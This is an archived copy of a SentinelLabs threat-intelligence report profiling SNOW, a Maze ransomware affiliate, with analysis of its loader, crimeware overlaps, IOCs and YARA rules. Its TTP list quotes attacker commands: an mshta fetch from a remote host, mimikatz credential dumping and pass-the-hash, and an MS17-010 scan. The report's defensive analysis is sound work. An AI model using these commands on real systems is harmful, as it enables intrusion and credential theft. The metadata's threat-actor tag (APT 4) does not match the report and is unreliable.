{
	"id": "1370a8d6-2ec4-466f-a9dc-466db9dca742",
	"created_at": "2026-04-06T00:13:43.230223Z",
	"updated_at": "2026-04-10T03:30:47.723018Z",
	"deleted_at": null,
	"sha1_hash": "aa90d72b1ed906edea6a107f142c1571b098ca56",
	"title": "Enter the Maze: Demystifying an Affiliate Involved in Maze (SNOW) - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2523111,
	"plain_text": "Enter the Maze: Demystifying an Affiliate Involved in Maze\r\n(SNOW) - SentinelLabs\r\nBy Jason Reaves\r\nPublished: 2020-07-22 · Archived: 2026-04-05 13:33:18 UTC\r\nAffiliate involved in Maze ransomware operations profiled from the actor perspective while also detailing their\r\ninvolvement in other groups.\r\nBy Jason Reaves and Joshua Platt\r\nExecutive Summary\r\nMaze continues to be one of the most dangerous and actively developed ransomware frameworks in the\r\ncrimeware space.\r\nMaze affiliates utilize red team tools and frameworks but also a custom loader commonly named\r\nDllCrypt[9].\r\nMaze affiliates utilize other malware and are involved with other high-end organized crimeware groups\r\nconducting systematic corporate data breaches including Zloader, Gozi and TrickBot as we will\r\ndemonstrate in our profiling of Maze affiliate SNOW.\r\nBackground\r\nMaze ransomware became famous for moving from widespread machine locking to corporate extortion with a\r\nblackmail component. Like most cybercrime groups, their intention is to maximize profits. As companies have\r\nadapted to the threat of ransomware by improving backup solutions and adding more layers of protection, the\r\nransomware actors would noticeably see a hit in their returns as companies refused to pay. It makes sense then to\r\nadd another layer since you have already infiltrated the network to add a blackmail component by stealing\r\nsensitive data.\r\nResearch Insight\r\nMost of the existing research into Maze shows that it is frequently a secondary or tertiary infection vector[8]. This\r\nmeans it is leveraged post initial access phase, frequently reported to be through RDP[5,6].\r\nTherefore, finding the loader being leveraged for delivering the Maze payload in memory is something that\r\ndoesn’t happen very frequently. This loader has been leveraged in its unpacked form[9] being directly downloaded\r\n(hxxp://37[.]1.210[.]52/vologda.dll).\r\nServer\r\nWhile researching the custom loader, we discovered an active attack server leveraged by a Maze affiliate, SNOW.\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 1 of 17\n\nTools\r\nGMER\r\nMimikatz\r\nMetasploit\r\nCobalt Strike\r\nPowerShell\r\nAdFind\r\nKoadic\r\nPowerShell Empire\r\nVictimology\r\nLawfirms\r\nDistributors and Resellers\r\nTTPs\r\nInitial Access\r\nBruting T1078\r\nSMB exploitation T1190\r\nRDP T1133\r\nExecution\r\nwhoami /priv T1059\r\nwhoami /groups T1059\r\nklist T1059\r\nnet group “Enterprise Admins” /domain T1059\r\nnet group “Domain Admins” /domain T1059\r\nmshta http://x.x.x.x/ktfrJ T1059\r\npowershell Find-PSServiceAccounts T1059\r\nPersistence \u0026 Privilege Escalation\r\nelevate svc-exe T1035, T1050\r\nelevate uac-token-duplication T1088, T1093\r\njump psexec_psh T1035, T1050\r\nDefense Evasion\r\nProcess injection to hide beacon\r\ninject 24636 x64 T1055\r\nCredential Access\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 2 of 17\n\nmimikatz sekurlsa::logonpasswords T1003, T1055, T1093\r\nhashdump T1003, T1055, T1093\r\nDiscovery\r\nportscan T1046\r\nnet share T1135, T1093\r\nLateral Movement\r\nmimikatz sekurlsa::pth T1075, T1093\r\nSMB exploitation T1210\r\nNetwork shares T1021\r\nPsexec T1077\r\nAttack Overview\r\nInitial access involved using an infected system with RDP opened to the internet for scanning, scanning performed\r\nwas both SMB and RDP based.\r\nOnce the actor has an infected system, they will sometimes reuse it for further scanning either internally or\r\nexternally.\r\nExample actor leveraging Metasploit for SMB scanning:\r\nuse auxiliary/scanner/smb/smb_ms17_010\r\nThe actor also leveraged Cobalt Strike on selected infections to perform RDP scanning using portscan.\r\nMultiple check-in logs indicated the beacon’s preferred stager parent was PowerShell.\r\nprocess: powershell.exe; pid: 28068; os: Windows; version: 10.0; beacon arch: x64 (x64)\r\nMultiple systems the actor gained initial access to had no Administrator access, so the actor frequently would then\r\nbegin looking for other systems and mapping out the network (recon).\r\nThe actor was also very patient in these situations, choosing to focus on several persistence paths using multiple\r\nbackdoors and waiting in the hopes that someone would login to the system with higher access. The actor would\r\nsometimes let these infections sit for 2-3 days before logging back in and checking them.\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 3 of 17\n\nIf the actor did have higher privileges, then they would frequently attempt to escalate using methods outlined in\r\nthe Privilege Escalation section of the TTP (Tactics, Techniques and Procedures) section. The actor would begin\r\nlooking for other systems they could access using existing credentials, mapped shares, other harvested credentials,\r\nor vulnerabilities.\r\nOnce the actor had mapped out the network and harvested credentials from normal workstations, they would\r\nattempt to pivot to higher profile servers such as the domain controller.\r\nDue to the likelihood of the actor exfiltrating data or performing ransom activities the investigation ends here with\r\nthe takedown of the server.\r\neCrime Overlaps\r\nBefore looking at the overlaps, we should explain that this actor uses a particular loader that is designed to\r\ndetonate the onboard protected Maze file.\r\nMost of the loaders discovered start with a killswitch check, this loader immediately has one such string:\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 4 of 17\n\nIn the event that the file “C:AhnLabSucks” exists, then the DLL will print the message “Ahnlab really sucksn”\r\nand will then exit.\r\nIf it doesn’t exist, it begins allocating memory and copying over data:\r\nNext some hardcoded strings are loaded:\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 5 of 17\n\nEventually, this leads to a function call that is sitting in a loop along with a sub loop for XORing. This is a\r\ncommonly seen code structure for encryption algorithms such as AES.\r\nThis, however, is not AES; it turns out to be Sosemanuk[7]. If you’ve never identified encryption or compression\r\nalgorithms before, hardcoded values are a good place to try to identify the encryption routine. Take for example\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 6 of 17\n\nthis hardcoded DWORD value:\r\nSearching for this value led me to Sosemanuk source code, which I then compared with what I was seeing in the\r\nbinary:\r\nunum32 tt, or1;\r\ntt = XMUX(r1, s ## x1, s ## x8);\r\nor1 = r1;\r\nr1 = T32(r2 + tt);\r\ntt = T32(or1 * 0x54655307);\r\nr2 = ROTL(tt, 7);\r\nPFSM;\r\n} while (0)\r\nThere were also a number of hardcoded tables used:\r\nA search for ‘0xe19fcf13’ gets us hits for Sosemanuk source code, and we can find the tables pretty easily from\r\nthe source:\r\nstatic unum32 mul_a[] = {\r\n0x00000000, 0xE19FCF13, 0x6B973726, 0x8A08F835,\r\n0xD6876E4C, 0x3718A15F, 0xBD10596A, 0x5C8F9679,\r\n0x05A7DC98, 0xE438138B, 0x6E30EBBE, 0x8FAF24AD,\r\n\u003c..snip..\u003e\r\nstatic unum32 mul_ia[] = {\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 7 of 17\n\n0x00000000, 0x180F40CD, 0x301E8033, 0x2811C0FE,\r\n0x603CA966, 0x7833E9AB, 0x50222955, 0x482D6998,\r\n0xC078FBCC, 0xD877BB01, 0xF0667BFF, 0xE8693B32,\r\n\u003c..snip..\u003e\r\nAfter downloading the source and building it into a shared object library, we can utilize this shared object file\r\nfrom Python. To test, I ripped out the small block of data that was copied over and then used the Sosemanuk\r\npython script that was provided by the package at https://www.seanet.com/~bugbee/crypto/sosemanuk/.\r\npySosemanuk version: 0.01\r\n*** good ***\r\n\u003e\u003e\u003e key = 'IDZT6frSHDHsfdsffiFduffz8GD7sddg'\r\n\u003e\u003e\u003e iv = '832748zr89243zr7'\r\n\u003e\u003e\u003e sm = Sosemanuk(key,iv)\r\n\u003e\u003e\u003e data = open('small.bin', 'rb').read()\r\n\u003e\u003e\u003e t = sm.decryptBytes(data)\r\n\u003e\u003e\u003e t\r\n'Ux89xe5x83xec8dxa10x00x00x00x8b@x0cx8b@x14x8bx00x8bx00x8b@x10x89Exfcx8bExfcx89x04$xc7D$x04xaaxfcr|xe\r\nThis turns out to be the code that will map a binary into memory:\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 8 of 17\n\nThere is also a larger chunk of data that will be copied over later:\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 9 of 17\n\nWe can hazard a guess this will be a PE file, but since the same Sosemanuk encryption key and IV will be utilized\r\nwe can just decrypt and check:\r\npySosemanuk version: 0.01\r\n*** good ***\r\n\u003e\u003e\u003e key = 'IDZT6frSHDHsfdsffiFduffz8GD7sddg'\r\n\u003e\u003e\u003e iv = '832748zr89243zr7'\r\n\u003e\u003e\u003e sm = Sosemanuk(key,iv)\r\n\u003e\u003e\u003e help(sm)\r\n\u003e\u003e\u003e data = open('large.bin', 'rb').read()\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 10 of 17\n\n\u003e\u003e\u003e t = sm.decryptBytes(data)\r\n\u003e\u003e\u003e t[:100]\r\n'MZx90x00x03x00x00x00x04x00x00x00xffxffx00x00xb8x00x00x00x00x00x00x00@x00x00x00x00x00x00x00x00x00x00x\r\nMaze\r\nAfter decrypting out the payload it is very easy to identify that it is a sample of Maze ransomware:\r\nThere are two interesting overlaps involving this Maze Loader. The first is that one of the actor’s recovered\r\nsamples was a crypted sample of a Maze loader with a certificate chain onboard from Sectigo for\r\n“BCJTJEJXDCZSKZPJGJ0”.\r\nPivoting on this chain leads us to a number of eCrime malware families that have been used for delivering second\r\nstage malware previously.\r\nGozi:\r\n4f61fcafad37cc40632ad85e4f8aa503d63700761e49db19c122bffa7084e4ec\r\nb9127a38c105987631df3a245c009dc9519bb790e27e8fd6de682b89f76d7db8\r\n6e5d049342c2fe60fad02a5ab494ff9d544e7952f67762dbd183f71f857b3e66\r\nbaea0b117de8a7f42ff04d69c648fe5ec7ae8ad886b6fa9e039d9d847577108d\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 11 of 17\n\nZloader:\r\n6fed2a5943e866a67e408a063589378ae4ce3aa2907cc58525a1b8f423284569\r\nZloader botnet: main\r\nGozi serpent keys: 7J79T4MEk8rkf3MT, 7EIrW8BoJ9xkYsKU, 21291029JSJUXMPP\r\nAlso interesting is that the new Gozi being utilized by Gozi ConfCrew[10] uses one of these keys for their loader\r\nservice: ‘21291029JSJUXMPP’.\r\nSecondly, during our investigation of a packed sample of this loader, we noticed that it was delivering Maze with a\r\nvery distinctive crypter commonly associated with TrickBot.\r\nTrickBot Crypter\r\nThe crypter being used here is one that is predominately utilized by TrickBot customers. The latest variant is easy\r\nto identify due to its continued use of VirtualAllocExNuma and a modified RC4 routine.\r\nThe string “383669855” is the ROR-13 hash of VirtualAllocExNuma after being uppcased.\r\n\u003e\u003e\u003e a = 'virtualallocexnuma'.upper()\r\n\u003e\u003e\u003e a\r\n'VIRTUALALLOCEXNUMA'\r\n\u003e\u003e\u003e h = 0\r\n\u003e\u003e\u003e for c in a:\r\n...  h = ror(h, 13)\r\n...  h += ord(c)\r\n...\r\n\u003e\u003e\u003e h\r\n383669855\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 12 of 17\n\nAfter being resolved, it will be used to allocate a large chunk of memory and have the data copied over.\r\nThe data will then be decrypted using a slightly modified version of RC4, the SBOX size is extended.\r\nAfter unpacking we are left with a DLL. This DLL turns out to be the Maze Loader that we discussed earlier.\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 13 of 17\n\nThis loader also has a certificate appended to it in the overlay data:\r\nCertificate:\r\nData:\r\nVersion: 3 (0x2)\r\nSerial Number:\r\n02:ac:5c:26:6a:0b:40:9b:8f:0b:79:f2:ae:46:25:77\r\nSignature Algorithm: sha1WithRSAEncryption\r\nIssuer: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance EV Root\r\nValidity\r\nNot Before: Nov 10 00:00:00 2006 GMT\r\nNot After : Nov 10 00:00:00 2031 GMT\r\nSubject: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance EV Roo\r\nSubject Public Key Info:\r\nPublic Key Algorithm: rsaEncryption\r\nThe overlay certificate even includes the WIN_CERTIFICATE structure, so it was possibly ripped off a binary and\r\nthen appended to the end of the file.\r\nFinding Structure in Noise\r\nAs previously mentioned, we began tracking this actor’s attack servers, which predominantly leverage the use of\r\nCobalt Strike. However, trying to pivot on a tool like Cobalt Strike can be challenging, as you will get lost in a sea\r\nof data pretty quickly. It can be easy to simply look for beacons using the same IOC and pivot on that, but that is\r\nnaive so we decided to look for some other ways. It’s worth mentioning that this is a very important reason why\r\nthreat intel needs reverse-engineers, providing a further technical look at the data to try to pivot on, much the same\r\nway an attacker or a pentester will try to pivot when looking at infrastructure: the same techniques and approaches\r\nshould be utilized in malware research bridging the technical gap of malware reverse-engineering with threat intel.\r\nThe Cobalt Strike beacons discovered here provide an excellent opportunity to showcase this methodology using a\r\nreal world example. Let’s take a recovered beacon from this investigation where the attacker was using the leaked\r\nversion of Cobalt Strike.\r\n'WATERMARK': '305419896'\r\nThe above is the watermark value from the recovered Cobalt Strike beacon config. These values stored packed in\r\na structure that is XOR encoded inside of the beacons. This data is signaturable, however. Let’s take a look:\r\n\u003e\u003e\u003e b = struct.pack('\u003eI', 305419896)\r\n\u003e\u003e\u003e t.find(b)\r\n240590\r\n\u003e\u003e\u003e t[240580:240600]\r\nbytearray(b'x00x00x00x00x00%x00x02x00x04x124Vxx00\u0026x00x01x00x02')\r\n\u003e\u003e\u003e chr(37)\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 14 of 17\n\n'%'\r\n\u003e\u003e\u003e t2 = 'x00x00x00x00%x00x02x00x04x124Vx'\r\n37 is the value used to designate the watermark value inside the beacon config. To pivot on this data in OSINT, all\r\nwe need to do is look for the data block above. For the purposes of example, I will only show a simple example\r\nwhere we use the default XOR key for Cobalt Strike beacon configs:\r\n\u003e\u003e\u003e import binascii\r\n\u003e\u003e\u003e binascii.hexlify(t2)\r\n'00000000250002000412345678'\r\n\u003e\u003e\u003e t3 = bytearray(t2)\r\n\u003e\u003e\u003e for i in range(len(t3)):\r\n...  t3[i] ^= 0x2e\r\n...\r\n\u003e\u003e\u003e binascii.hexlify(t3)\r\n'2e2e2e2e0b2e2c2e2a3c1a7856'\r\nTaking a look at the results in VirusTotal:\r\nSo now we have at least narrowed our sea of Cobalt Strike beacons down a bit to a pool of \u003c100 samples.\r\nWhile looking at the config data for these beacons, we notice more trends that begin to stick out:\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 15 of 17\n\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\nLeading to possibly more related infrastructure:\r\n'SUBMITURI': '/submit.php', 'DOMAINS': '217.12.218[.]99,/ptj'\r\nAnother interesting aspect of this watermark is that it shows up at the end of the PowerShell stager shellcode as\r\nwell:\r\nx00x00Pxc3xe8x9fxfdxffxff37.1.210[.]52x00x124Vx\")\r\nAs mentioned, this leads to other infrastructure that could be used by either the affiliate or another affiliate\r\ninvolved in Maze. The investigation is ongoing as the actors appear to be very active.\r\nConclusion\r\nWe have covered in this paper tracking and profiling one of the actors involved in Maze ransomware while also\r\ndiscovering intel of his involvement with multiple other major eCrime families including Zloader, Gozi and\r\nTrickBot.\r\nThe notorious ransomware group, Maze, which leverages blackmail and data theft on top of file locking is now\r\nfound with evidence of an affiliate being involved in multiple major eCrime groups and utilizing a service that is\r\npredominantly associated with TrickBot and their customers. Most of the major crimeware families have\r\ncapabilities to deliver other files and this means more things to think about for enterprise defenders as alerts are\r\nprioritized, dwell time can be a gamble and it’s no longer safe to assume that you can expect an infection to act a\r\ncertain way.\r\nIOCs\r\nUnpacked samples:\r\n85e38cc3b78cbb92ade81721d8cec0cb6c34f3b5\r\n07849ba4d2d9cb2d13d40ceaf37965159a53c852\r\nIPs\r\n37[.]1[.]210[.]52\r\nMitigation \u0026 Recommendations\r\nEndpoint\r\nKillSwitch file: C:AhnLabSucks\r\nYARA\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 16 of 17\n\nrule trick_crypter_vallocnuma_hash\r\n{\r\nstrings:\r\n$a1 = “383669855”\r\ncondition:\r\nall of them\r\n}\r\nrule Maze_Loader\r\n{\r\nstrings:\r\n$sosemanuk_key = “IDZT6frSHDHsfdsffiFduffz8GD7sddg”\r\n$ahnlab_messages1 = “Ahnlab really sucks”\r\n$ahnlab_messages2 = “AhnLabSucks”\r\ncondition:\r\n$sosemanuk_key or all of ($ahnlab_messages*)\r\n}\r\nReferences\r\n1: https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/\r\n2: https://www.fidelissecurity.com/threatgeek/archive/trickbot-we-missed-you-dyre/\r\n3: https://www.sentinelone.com/labs/anchor-project-the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/\r\n4: https://www.sentinelone.com/labs/maze-ransomware-update-extorting-and-exposing-victims/\r\n5: https://threatpost.com/maze-ransomware-cognizant/154957/\r\n6: https://twitter.com/VK_Intel/status/1251388507219726338\r\n7: https://www.seanet.com/~bugbee/crypto/sosemanuk/\r\n8: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\n9: https://twitter.com/malwrhunterteam/status/1265317887167926272\r\n10: https://www.sentinelone.com/labs/valak-malware-and-the-connection-to-gozi-loader-confcrew/\r\nSource: https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/"
	],
	"report_names": [
		"enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow"
	],
	"threat_actors": [
		{
			"id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337",
			"created_at": "2022-10-25T16:07:23.318008Z",
			"updated_at": "2026-04-10T02:00:04.539063Z",
			"deleted_at": null,
			"main_name": "APT 4",
			"aliases": [
				"APT 4",
				"Bronze Edison",
				"Maverick Panda",
				"Salmon Typhoo",
				"Sodium",
				"Sykipot",
				"TG-0623",
				"Wisp Team"
			],
			"source_name": "ETDA:APT 4",
			"tools": [
				"Getkys",
				"Sykipot",
				"Wkysol",
				"XMRig"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434423,
	"ts_updated_at": 1775791847,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aa90d72b1ed906edea6a107f142c1571b098ca56.pdf",
		"text": "https://archive.orkl.eu/aa90d72b1ed906edea6a107f142c1571b098ca56.txt",
		"img": "https://archive.orkl.eu/aa90d72b1ed906edea6a107f142c1571b098ca56.jpg"
	}
}